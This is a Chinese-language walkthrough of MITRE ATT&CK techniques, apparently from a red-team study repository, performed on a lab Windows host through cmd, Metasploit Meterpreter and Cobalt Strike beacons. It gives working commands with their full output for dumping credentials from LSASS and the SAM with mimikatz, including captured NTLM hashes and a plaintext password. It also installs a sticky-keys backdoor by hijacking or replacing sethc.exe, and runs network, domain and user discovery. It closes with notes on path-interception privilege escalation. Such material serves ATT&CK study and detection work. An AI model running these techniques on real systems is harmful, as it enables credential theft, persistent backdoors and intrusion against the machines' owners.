ATT&CK实操

项目地址:https://github.com/lengjibo/ATT-CK-CN — 冷逸

(凭证窃取)Credential Dumping

Dump credentials from LSASS(从LSASS中窃取凭证)

实现原理:

This technique injects into the LSASS.exe process and scrapes its memory for plaintext passwords of logged on users. You must do this from a high integrity process.
注入lsass .exe进程,并从其内存中提取登录用户的明文密码

msf下操作:

use mimikatz

wdigest(获取WDigest凭据)

msv (获取msv凭据(hash))

kerberos (获取kerberos)

meterpreter > use mimikatz
Loading extension mimikatz...Success.
meterpreter > wdigest
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;53216 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP ROOT-5DE52AC98B$
0;146131 NTLM ROOT-5DE52AC98B Administrator 123456
meterpreter > msv
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;146131 NTLM ROOT-5DE52AC98B Administrator lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;53216 NTLM n.s. (Credentials KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;999 NTLM WORKGROUP ROOT-5DE52AC98B$ n.s. (Credentials KO)
meterpreter > kerberos
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;53216 NTLM
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP ROOT-5DE52AC98B$
0;146131 NTLM ROOT-5DE52AC98B Administrator 123456

cs下操作

logonpasswords

mimikatz !sekurlsa::logonpasswords

mimikatz !sekurlsa::msv

mimikatz !sekurlsa::kerberos

mimikatz !sekurlsa::wdigest

beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 630354 bytes
[+] received output:
Authentication Id : 0 ; 338316 (00000000:0005298c)
Session : Interactive from 0
User Name : Administrator
Domain : ROOT-5DE52AC98B
Logon Server : ROOT-5DE52AC98B
Logon Time : 2019-9-4 19:18:26
SID : S-1-5-21-1911985068-4225083820-4011728908-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : ROOT-5DE52AC98B
* LM : 44efce164ab921caaad3b435b51404ee
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
wdigest :
* Username : Administrator
* Domain : ROOT-5DE52AC98B
* Password : 123456
kerberos :
* Username : Administrator
* Domain : ROOT-5DE52AC98B
* Password : 123456
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2019-9-4 19:14:12
SID : S-1-5-20
msv :
[00000002] Primary
* Username : ROOT-5DE52AC98B$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : ROOT-5DE52AC98B$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : root-5de52ac98b$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2019-9-4 19:14:12
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 53331 (00000000:0000d053)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2019-9-4 19:14:12
SID :
msv :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : ROOT-5DE52AC98B$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2019-9-4 19:14:12
SID : S-1-5-18
msv :
wdigest :
kerberos :
* Username : root-5de52ac98b$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Dumps hashes from the SAM Hive file(从sam文件里面读取hash)

实现原理:

The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.
sam文件存放着hash,然后读取该文件进行获得凭证

msf下操作

hashdump (普通hash获取)

run hashdump

post/windows/gather/credentials/domain_hashdump (获取域hash)

meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:1dce4321e5283c3e841070331873c406:085f84e35a1bfb09ca65d008cc988cae:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_ROOT-5DE52AC98B:1003:406eafe671e3ac72ddb9179ad9a2204a:4fa4e3f7ef6f5dc7e1b129caab134cbd:::
IWAM_ROOT-5DE52AC98B:1004:53aacf61b38888da87c793e8c36cb74a:14ba2ea13539973d3f0be627e43ff408:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:7490f8cea3cd28b37717a5d4be375404:::
meterpreter > run hashdump (需要系统权限)
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY be7ba5c5d5c67d878cd0845b2b4d1027...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
msf5 post(windows/gather/credentials/domain_hashdump) > exploit
[*] Session has Admin privs
[-] This does not appear to be an AD Domain Controller
[*] Post module execution completed

cs下操作

hashdump

mimikatz !lsadump::sam

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 63557 bytes
[+] received password hashes:
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:1dce4321e5283c3e841070331873c406:085f84e35a1bfb09ca65d008cc988cae:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_ROOT-5DE52AC98B:1003:406eafe671e3ac72ddb9179ad9a2204a:4fa4e3f7ef6f5dc7e1b129caab134cbd:::
IWAM_ROOT-5DE52AC98B:1004:53aacf61b38888da87c793e8c36cb74a:14ba2ea13539973d3f0be627e43ff408:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:7490f8cea3cd28b37717a5d4be375404:::
beacon> mimikatz !lsadump::sam
[*] Tasked beacon to run mimikatz's !lsadump::sam command
[+] host called home, sent: 841287 bytes
[+] received output:
Domain : ROOT-5DE52AC98B
SysKey : be7ba5c5d5c67d878cd0845b2b4d1027
Local SID : S-1-5-21-1911985068-4225083820-4011728908
SAMKey : 5dfe2beb57a9d468ed8a72c51c7334ff
RID : 000001f4 (500)
User : Administrator
Hash LM : 44efce164ab921caaad3b435b51404ee
Hash NTLM: 32ed87bdb5fdc5e9cba88547376818d4
RID : 000001f5 (501)
User : Guest
RID : 000003e9 (1001)
User : SUPPORT_388945a0
Hash NTLM: 7490f8cea3cd28b37717a5d4be375404
RID : 000003eb (1003)
User : IUSR_ROOT-5DE52AC98B
Hash LM : 406eafe671e3ac72ddb9179ad9a2204a
Hash NTLM: 4fa4e3f7ef6f5dc7e1b129caab134cbd
RID : 000003ec (1004)
User : IWAM_ROOT-5DE52AC98B
Hash LM : 53aacf61b38888da87c793e8c36cb74a
Hash NTLM: 14ba2ea13539973d3f0be627e43ff408
RID : 000003ee (1006)
User : ASPNET
Hash LM : 1dce4321e5283c3e841070331873c406
Hash NTLM: 085f84e35a1bfb09ca65d008cc988cae

(注册表查询)Query Registry

Check terminal services(检测终端服务)

原理:

Check for the current registry value for terminal services, if it's 0, then terminal services are enabled. If it's 1, then they're disabled
从注册表中的键值检测是否开启终端服务,如果是0,则为开启,为1则是关闭

terminal(cmd)下操作:

C:\Documents and Settings\Administrator\����>reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
fDenyTSConnections REG_DWORD 0x0

msf下操作:

reg queryval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections

post/windows/gather/enum_termserv (不好用)

meterpreter > reg queryval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
Name: fDenyTSConnections
Type: REG_DWORD
Data: 0
msf5 post(windows/gather/enum_termserv) > exploit
[*] Doing enumeration for S-1-5-21-1911985068-4225083820-4011728908-500
[*] Post module execution completed

cs下操作

shell reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

beacon> shell reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
[*] Tasked beacon to run: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
[+] host called home, sent: 132 bytes
[+] received output:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
fDenyTSConnections REG_DWORD 0x1

(易访问特征)Accessibility Features

Point sethc.exe file to cmd.exe(使用sethc启动cmd)

原理:

Modify the registry to point the sethc.exe file to point to cmd.exe
修改注册表使sethc指向cmd,然后五次shift后就可以调出cmd,当然你也可以使用这种方法去激活一个msf的shell

terminal下操作:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

C:\Documents and Settings\Administrator>REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ
/d "C:\windows\system32\cmd.exe" /f
操作成功完成。

msf下操作

post/windows/manage/sticky_keys

msf5 post(windows/manage/sticky_keys) > exploit
[+] Session has administrative rights, proceeding.
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times.
[*] Post module execution completed

cs下操作

shell REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

beacon> shell REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
[*] Tasked beacon to run: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
[+] host called home, sent: 187 bytes
[+] received output:
操作成功完成。

Replace real sethc.exe with a copy of cmd.exe(用cmd的副本代替sethc)

使用takeown.exe获取系统ALC权限,然后替换

terminal下操作:

takeown.exe C:\Windows\system32\sethc.exe

del C:\Windows\system32\sethc.exe

copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe

C:\Documents and Settings\Administrator>takeown.exe C:\Windows\system32\sethc.ex
e
错误: 无效参数/选项 - 'C:\Windows\system32\sethc.exe'。
键入 "TAKEOWN /?" 以了解用法。
C:\Documents and Settings\Administrator>del C:\Windows\system32\sethc.exe
C:\Documents and Settings\Administrator>copy C:\Windows\system32\cmd.exe C:\Wind
ows\system32\sethc.exe
覆盖 C:\Windows\system32\sethc.exe 吗? (Yes/No/All): yes
已复制 1 个文件。

cs下操作:

shell takeown.exe C:\Windows\system32\sethc.exe

shell del C:\Windows\system32\sethc.exe

shell copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe

beacon> shell takeown.exe C:\Windows\system32\sethc.exe
[*] Tasked beacon to run: takeown.exe C:\Windows\system32\sethc.exe
[+] host called home, sent: 72 bytes
[+] received output:
错误: 无效参数/选项 - 'C:\Windows\system32\sethc.exe'。
键入 "TAKEOWN /?" 以了解用法。
beacon> shell del C:\Windows\system32\sethc.exe
[*] Tasked beacon to run: del C:\Windows\system32\sethc.exe
beacon> shell copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe
[*] Tasked beacon to run: copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe
[+] host called home, sent: 157 bytes
[+] received output:
已复制 1 个文件。

(系统网络配置发现)System Network Configuration Discovery

Get network information(发现网络信息)

terminal下操作:

ipconfig /all

C:\Documents and Settings\Administrator>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : root-5de52ac98b
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-D4-66-73
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.2.114
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
DHCP Server . . . . . . . . . . . : 192.168.2.1
DNS Servers . . . . . . . . . . . : 192.168.2.1
Lease Obtained. . . . . . . . . . : 2019年9月4日 19:14:12
Lease Expires . . . . . . . . . . : 2019年9月5日 19:14:12
C:\Documents and Settings\Administrator>

msf下操作:

post/windows/gather/enum_domains

msf5 post(windows/gather/enum_domains) > exploit
[*] Enumerating DCs for WORKGROUP
[-] No Domain Controllers found...
[*] Post module execution completed

cs下操作:

shell ipconfig /all

beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:
Windows IP Configuration
Host Name . . . . . . . . . . . . : root-5de52ac98b
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-0C-29-D4-66-73
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.2.114
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
DHCP Server . . . . . . . . . . . : 192.168.2.1
DNS Servers . . . . . . . . . . . : 192.168.2.1
Lease Obtained. . . . . . . . . . : 2019年9月4日 19:14:12
Lease Expires . . . . . . . . . . : 2019年9月5日 19:14:12

Get ARP table(获取arp表)

terminal下操作

arp -a

router print

C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.2.114 --- 0x10003
Internet Address Physical Address Type
192.168.2.1 fc-7c-02-de-0e-c8 dynamic
192.168.2.107 b4-6b-fc-47-ad-60 dynamic

msf下操作:

router

meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.2.1 10 65539
127.0.0.0 255.0.0.0 127.0.0.1 1 1
192.168.2.0 255.255.255.0 192.168.2.114 10 65539
192.168.2.114 255.255.255.255 127.0.0.1 10 1
192.168.2.255 255.255.255.255 192.168.2.114 10 65539
224.0.0.0 240.0.0.0 192.168.2.114 10 65539
255.255.255.255 255.255.255.255 192.168.2.114 1 65539

cs下操作:

arp -a

beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:
Interface: 192.168.2.114 --- 0x10003
Internet Address Physical Address Type
192.168.2.1 fc-7c-02-de-0e-c8 dynamic
192.168.2.107 b4-6b-fc-47-ad-60 dynamic

Dump MAC, IP addresses and codes(获取mac、ip地址和其描述性代码)

用于获取计算机的MAC和IP地址以及一些描述性代码(0x1C表示一个域控制器)

termainal下操作:

nbtstat -a ip

C:\Documents and Settings\Administrator>nbtstat -a ip
本地连接:
Node IpAddress: [192.168.2.114] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
ROOT-5DE52AC98B<00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
ROOT-5DE52AC98B<20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-0C-29-D4-66-73

cs下操作:

shell c:\windows\system32\nbtstat.exe -a ip

beacon> shell c:\windows\system32\nbtstat.exe -a 192.168.2.114
[*] Tasked beacon to run: c:\windows\system32\nbtstat.exe -a 192.168.2.114
[+] host called home, sent: 79 bytes
[+] received output:
本地连接:
Node IpAddress: [192.168.2.114] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
ROOT-5DE52AC98B<00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
ROOT-5DE52AC98B<20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
WORKGROUP <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-0C-29-D4-66-73

(远程系统发现)Remote System Discovery

Get the list of domain computers(获取域主机列表)

terminal下操作:

net group "Domain Computers" /domain

C:\Documents and Settings\Administrator>net group "Domain Computers" /domain
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在,或无法联系。

msf下操作:

post/windows/gather/enum_ad_computers

post/windows/gather/enum_computers

msf5 post(windows/gather/enum_ad_computers) > exploit
[-] Unable to find the domain to query.
[*] Post module execution completed
msf5 post(windows/gather/enum_computers) > exploit
[*] Running module against ROOT-5DE52AC98B
[-] This host is not part of a domain.
[*] Post module execution completed

cs下操作:

shell net group "Domain Computers" /domain

beacon> shell net group "Domain Computers" /domain
[*] Tasked beacon to run: net group "Domain Computers" /domain
[+] host called home, sent: 67 bytes
[+] received output:
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在,或无法联系

Get the list of domain controllers(获取域控列表)

terminal下操作:

net group "Domain Controllers" /domain[:DOMAIN]

C:\Documents and Settings\Administrator>net group "Domain Controllers" /domain
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在,或无法联系

cs下操作:

shell net group "Domain Controllers" /domain

beacon> shell net group "Domain Controllers" /domain
[*] Tasked beacon to run: net group "Domain Controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在,或无法联系。

Display trust relationship with domain controller(显示域信任关系)

terminal下操作:

nltest /dclist

Display the active directory login server of the workstation(显示ad域工作组的登录器)

terminal下操作:

echo %LOGONSERVER%

C:\Documents and Settings\Administrator>echo %LOGONSERVER%
\\ROOT-5DE52AC98B

cs下操作:

shell echo %LOGONSERVER%

beacon> shell echo %LOGONSERVER%
[*] Tasked beacon to run: echo %LOGONSERVER%
[+] host called home, sent: 49 bytes
[+] received output:
\\ROOT-5DE52AC98B

(系统用户发现)System Owner/User Discovery

Get user information(获取用户信息)

terminal下操作:

whoami /all /fo list

C:\Documents and Settings\Administrator>whoami
root-5de52ac98b\administrator
C:\Documents and Settings\Administrator>whoami /all
用户信息
----------------
用户名 SID
============================= =============================================
root-5de52ac98b\administrator S-1-5-21-1911985068-4225083820-4011728908-500
组信息
-----------------
组名 类型 SID 属性
================================ ====== ============ ===========================
===============
Everyone 已知组 S-1-1-0 必需的组, 启用于默认, 启用
的组
BUILTIN\Administrators 别名 S-1-5-32-544 必需的组, 启用于默认, 启用
的组, 组的所有者
BUILTIN\Users 别名 S-1-5-32-545 必需的组, 启用于默认, 启用
的组
NT AUTHORITY\INTERACTIVE 已知组 S-1-5-4 必需的组, 启用于默认, 启用
的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11 必需的组, 启用于默认, 启用
的组
NT AUTHORITY\This Organization 已知组 S-1-5-15 必需的组, 启用于默认, 启用
的组
LOCAL 已知组 S-1-2-0 必需的组, 启用于默认, 启用
的组
NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10 必需的组, 启用于默认, 启用
的组
特权信息
----------------------
特权名 描述 状态
=============================== ========================== ======
SeLockMemoryPrivilege 内存中锁定页面 已禁用
SeChangeNotifyPrivilege 跳过遍历检查 已启用
SeSecurityPrivilege 管理审核和安全日志 已禁用
SeBackupPrivilege 备份文件和目录 已禁用
SeRestorePrivilege 还原文件和目录 已禁用
SeSystemtimePrivilege 更改系统时间 已禁用
SeShutdownPrivilege 关闭系统 已禁用
SeRemoteShutdownPrivilege 从远程系统强制关机 已禁用
SeTakeOwnershipPrivilege 取得文件或其他对象的所有权 已禁用
SeDebugPrivilege 调试程序 已禁用
SeSystemEnvironmentPrivilege 修改固件环境值 已禁用
SeSystemProfilePrivilege 配置系统性能 已禁用
SeProfileSingleProcessPrivilege 配置单一进程 已禁用
SeIncreaseBasePriorityPrivilege 增加计划优先级 已禁用
SeLoadDriverPrivilege 装载和卸载设备驱动程序 已禁用
SeCreatePagefilePrivilege 创建页面文件 已禁用
SeIncreaseQuotaPrivilege 调整进程的内存配额 已禁用
SeUndockPrivilege 从扩展坞中取出计算机 已禁用
SeManageVolumePrivilege 执行卷维护任务 已禁用
SeImpersonatePrivilege 身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege 创建全局对象 已启用
C:\Documents and Settings\Administrator>whoami /all /fo list
用户信息
----------------
用户名: root-5de52ac98b\administrator
SID: S-1-5-21-1911985068-4225083820-4011728908-500
组信息
-----------------
组名: Everyone
类型: 已知组
SID: S-1-1-0
属性: 必需的组, 启用于默认, 启用的组
组名: BUILTIN\Administrators
类型: 别名
SID: S-1-5-32-544
属性: 必需的组, 启用于默认, 启用的组, 组的所有者
组名: BUILTIN\Users
类型: 别名
SID: S-1-5-32-545
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\INTERACTIVE
类型: 已知组
SID: S-1-5-4
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\Authenticated Users
类型: 已知组
SID: S-1-5-11
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\This Organization
类型: 已知组
SID: S-1-5-15
属性: 必需的组, 启用于默认, 启用的组
组名: LOCAL
类型: 已知组
SID: S-1-2-0
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\NTLM Authentication
类型: 已知组
SID: S-1-5-64-10
属性: 必需的组, 启用于默认, 启用的组
特权信息
----------------------
特权名: SeLockMemoryPrivilege
描述: 内存中锁定页面
状态: 已禁用
特权名: SeChangeNotifyPrivilege
描述: 跳过遍历检查
状态: 已启用
特权名: SeSecurityPrivilege
描述: 管理审核和安全日志
状态: 已禁用
特权名: SeBackupPrivilege
描述: 备份文件和目录
状态: 已禁用
特权名: SeRestorePrivilege
描述: 还原文件和目录
状态: 已禁用
特权名: SeSystemtimePrivilege
描述: 更改系统时间
状态: 已禁用
特权名: SeShutdownPrivilege
描述: 关闭系统
状态: 已禁用
特权名: SeRemoteShutdownPrivilege
描述: 从远程系统强制关机
状态: 已禁用
特权名: SeTakeOwnershipPrivilege
描述: 取得文件或其他对象的所有权
状态: 已禁用
特权名: SeDebugPrivilege
描述: 调试程序
状态: 已禁用
特权名: SeSystemEnvironmentPrivilege
描述: 修改固件环境值
状态: 已禁用
特权名: SeSystemProfilePrivilege
描述: 配置系统性能
状态: 已禁用
特权名: SeProfileSingleProcessPrivilege
描述: 配置单一进程
状态: 已禁用
特权名: SeIncreaseBasePriorityPrivilege
描述: 增加计划优先级
状态: 已禁用
特权名: SeLoadDriverPrivilege
描述: 装载和卸载设备驱动程序
状态: 已禁用
特权名: SeCreatePagefilePrivilege
描述: 创建页面文件
状态: 已禁用
特权名: SeIncreaseQuotaPrivilege
描述: 调整进程的内存配额
状态: 已禁用
特权名: SeUndockPrivilege
描述: 从扩展坞中取出计算机
状态: 已禁用
特权名: SeManageVolumePrivilege
描述: 执行卷维护任务
状态: 已禁用
特权名: SeImpersonatePrivilege
描述: 身份验证后模拟客户端
状态: 已启用
特权名: SeCreateGlobalPrivilege
描述: 创建全局对象
状态: 已启用

msf下操作:

getuid

meterpreter > getuid
Server username: ROOT-5DE52AC98B\Administrator

cs下操作:

shell whoami /all /fo list

beacon> shell whoami /all /fo list
[*] Tasked beacon to run: whoami /all /fo list
[+] host called home, sent: 51 bytes
[+] received output:
用户信息
----------------
用户名: root-5de52ac98b\administrator
SID: S-1-5-21-1911985068-4225083820-4011728908-500
组信息
-----------------
组名: Everyone
类型: 已知组
SID: S-1-1-0
属性: 必需的组, 启用于默认, 启用的组
组名: BUILTIN\Administrators
类型: 别名
SID: S-1-5-32-544
属性: 必需的组, 启用于默认, 启用的组, 组的所有者
组名: BUILTIN\Users
类型: 别名
SID: S-1-5-32-545
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\INTERACTIVE
类型: 已知组
SID: S-1-5-4
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\Authenticated Users
类型: 已知组
SID: S-1-5-11
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\This Organization
类型: 已知组
SID: S-1-5-15
属性: 必需的组, 启用于默认, 启用的组
组名: LOCAL
类型: 已知组
SID: S-1-2-0
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\NTLM Authentication
类型: 已知组
SID: S-1-5-64-10
属性: 必需的组, 启用于默认, 启用的组
特权信息
----------------------
特权名: SeLockMemoryPrivilege
描述: 内存中锁定页面
状态: 已禁用
特权名: SeChangeNotifyPrivilege
描述: 跳过遍历检查
状态: 已启用
特权名: SeSecurityPrivilege
描述: 管理审核和安全日志
状态: 已禁用
特权名: SeBackupPrivilege
描述: 备份文件和目录
状态: 已禁用
特权名: SeRestorePrivilege
描述: 还原文件和目录
状态: 已禁用
特权名: SeSystemtimePrivilege
描述: 更改系统时间
状态: 已禁用
特权名: SeShutdownPrivilege
描述: 关闭系统
状态: 已禁用
特权名: SeRemoteShutdownPrivilege
描述: 从远程系统强制关机
状态: 已禁用
特权名: SeTakeOwnershipPrivilege
描述: 取得文件或其他对象的所有权
状态: 已禁用
特权名: SeDebugPrivilege
描述: 调试程序
状态: 已禁用
特权名: SeSystemEnvironmentPrivilege
描述: 修改固件环境值
状态: 已禁用
特权名: SeSystemProfilePrivilege
描述: 配置系统性能
状态: 已禁用
特权名: SeProfileSingleProcessPrivilege
描述: 配置单一进程
状态: 已禁用
特权名: SeIncreaseBasePriorityPrivilege
描述: 增加计划优先级
状态: 已禁用
特权名: SeLoadDriverPrivilege
描述: 装载和卸载设备驱动程序
状态: 已禁用
特权名: SeCreatePagefilePrivilege
描述: 创建页面文件
状态: 已禁用
特权名: SeIncreaseQuotaPrivilege
描述: 调整进程的内存配额
状态: 已禁用
特权名: SeUndockPrivilege
描述: 从扩展坞中取出计算机
状态: 已禁用
特权名: SeManageVolumePrivilege
描述: 执行卷维护任务
状态: 已禁用
特权名: SeImpersonatePrivilege
描述: 身份验证后模拟客户端
状态: 已启用
特权名: SeCreateGlobalPrivilege
描述: 创建全局对象
状态: 已启用

(路径劫持)Path Interception

原理:

在服务路径权限不对或者配置错误时会被攻击者进行提权操作
Service paths (stored in Windows Registry keys) [2] and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). [3] An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. [4] [5]
服务路径(存储在Windows注册表项中)[2]和快捷方式很容易被路径拦截,如果路径有一个或多个空格,并且没有被引号包围(例如,C:\ \program.exe vs. C:\ safe path with space\program.exe)。"C:\安全路径与空格\program.exe")。对手可以将可执行文件放在路径的较高级别目录中,Windows将解析该可执行文件而不是预期的可执行文件。例如,如果快捷方式中的路径是C:\program files\myapp。竞争对手可以在C:\program.exe上创建一个程序,该程序将代替预期的程序运行
PATH Environment Variable Misconfiguration
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
